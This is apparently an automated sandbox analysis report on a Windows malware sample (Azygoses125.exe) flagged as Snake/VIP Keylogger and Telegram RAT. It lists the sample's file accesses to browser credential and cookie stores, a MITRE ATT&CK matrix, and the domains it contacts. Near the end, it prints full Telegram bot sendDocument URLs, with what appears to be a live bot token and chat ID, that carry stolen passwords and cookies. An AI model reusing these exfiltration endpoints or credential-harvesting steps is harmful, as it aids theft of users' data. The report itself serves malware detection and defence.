Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0013~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.SecureBoot.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.SecureBoot.Commands.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.WindowsAuthenticationProtocols.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsAuthenticationProtocols.Commands.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.WindowsAuthenticationProtocols.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsAuthenticationProtocols.Commands.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.WindowsAuthenticationProtocols.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsAuthenticationProtocols.Commands.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package0012~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-UEV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\UEV\Microsoft.Uev.Commands.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\WindowsErrorReporting\Microsoft.WindowsErrorReporting.PowerShell.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Program Files (x86)\AutoIt3\AutoItX\AutoItX3.PowerShell.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure.CimCmdlets\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.CimCmdlets.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Queries volume information: C:\Windows\SysWOW64\msiexec.exe VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior

Source: C:\Users\user\Desktop\Azygoses125.exe

Code function: 3_2_004061A5 GetVersion,GetSystemDirectoryW,GetWindowsDirectoryW,SHGetSpecialFolderLocation,SHGetPathFromIDListW,CoTaskMemFree,lstrcatW,lstrlenW,

3_2_004061A5

Stealing of Sensitive Information

Yara detected Snake Keylogger

Source: Yara match

File source: 00000009.00000002.2545503931.0000000020991000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

Yara detected Telegram RAT

Source: Yara match	File source: 00000009.00000002.2545503931.0000000020B7D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: msiexec.exe PID: 5500, type: MEMORYSTR

Yara detected VIP Keylogger

Source: Yara match

File source: 00000009.00000002.2545503931.0000000020B7D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Windows\SysWOW64\msiexec.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Top Sites	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies	Jump to behavior

Tries to steal Mail credentials (via file / registry access)

Source: C:\Windows\SysWOW64\msiexec.exe

File opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\

Jump to behavior

Source: Yara match

File source: Process Memory Space: msiexec.exe PID: 5500, type: MEMORYSTR

Remote Access Functionality

Yara detected Snake Keylogger

Source: Yara match

File source: 00000009.00000002.2545503931.0000000020991000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

Yara detected Telegram RAT

Source: Yara match	File source: 00000009.00000002.2545503931.0000000020B7D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: msiexec.exe PID: 5500, type: MEMORYSTR

Yara detected VIP Keylogger

Source: Yara match

File source: 00000009.00000002.2545503931.0000000020B7D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	1 Windows Management Instrumentation	1 DLL Side-Loading	1 DLL Side-Loading	2 Obfuscated Files or Information	1 OS Credential Dumping	3 File and Directory Discovery	Remote Services	1 Archive Collected Data	1 Web Service	Exfiltration Over Other Network Medium	1 System Shutdown/Reboot
Credentials	Domains	Default Accounts	2 PowerShell	Boot or Logon Initialization Scripts	1 Access Token Manipulation	1 Software Packing	LSASS Memory	14 System Information Discovery	Remote Desktop Protocol	1 Data from Local System	3 Ingress Tool Transfer	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	311 Process Injection	1 DLL Side-Loading	Security Account Manager	211 Security Software Discovery	SMB/Windows Admin Shares	1 Email Collection	11 Encrypted Channel	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	11 Masquerading	NTDS	1 Process Discovery	Distributed Component Object Model	1 Clipboard Data	4 Non-Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	131 Virtualization/Sandbox Evasion	LSA Secrets	131 Virtualization/Sandbox Evasion	SSH	Keylogging	15 Application Layer Protocol	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 Access Token Manipulation	Cached Domain Credentials	1 Application Window Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	311 Process Injection	DCSync	1 System Network Configuration Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
Azygoses125.exe	29%	ReversingLabs	Win32.Ransomware.SnakeKeylogger

Dropped Files

Source	Detection	Scanner	Label	Link
C:\Users\user\AppData\Local\Temp\nsq93A2.tmp\nsExec.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\magmaet\clenched\Azygoses125.exe	29%	ReversingLabs	Win32.Ransomware.SnakeKeylogger

Source	Detection	Scanner	Label	Link
https://ion=v4.5	0%	Avira URL Cloud	safe
http://crl.microsoft.	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Reputation
drive.google.com	172.217.19.174	true	false	high
drive.usercontent.google.com	142.250.181.1	true	false	high
reallyfreegeoip.org	104.21.67.152	true	false	high
api.telegram.org	149.154.167.220	true	false	high
checkip.dyndns.com	132.226.8.169	true	false	high
checkip.dyndns.org	unknown	unknown	false	high

Contacted URLs

Name	Malicious	Reputation
https://reallyfreegeoip.org/xml/8.46.123.189	false	high
http://checkip.dyndns.org/	false	high
https://api.telegram.org/bot7745751910:AAGY46QDCTWO_Pw9iDqZhkNij-i4uwbMgzE/sendDocument?chat_id=7695061973&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0APW%20%7C%20user%20%7C%20VIP%20Recovery	false	high
https://api.telegram.org/bot7745751910:AAGY46QDCTWO_Pw9iDqZhkNij-i4uwbMgzE/sendDocument?chat_id=7695061973&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0ACookies%20%7C%20user%20%7C%20VIP%20Recovery	false	high
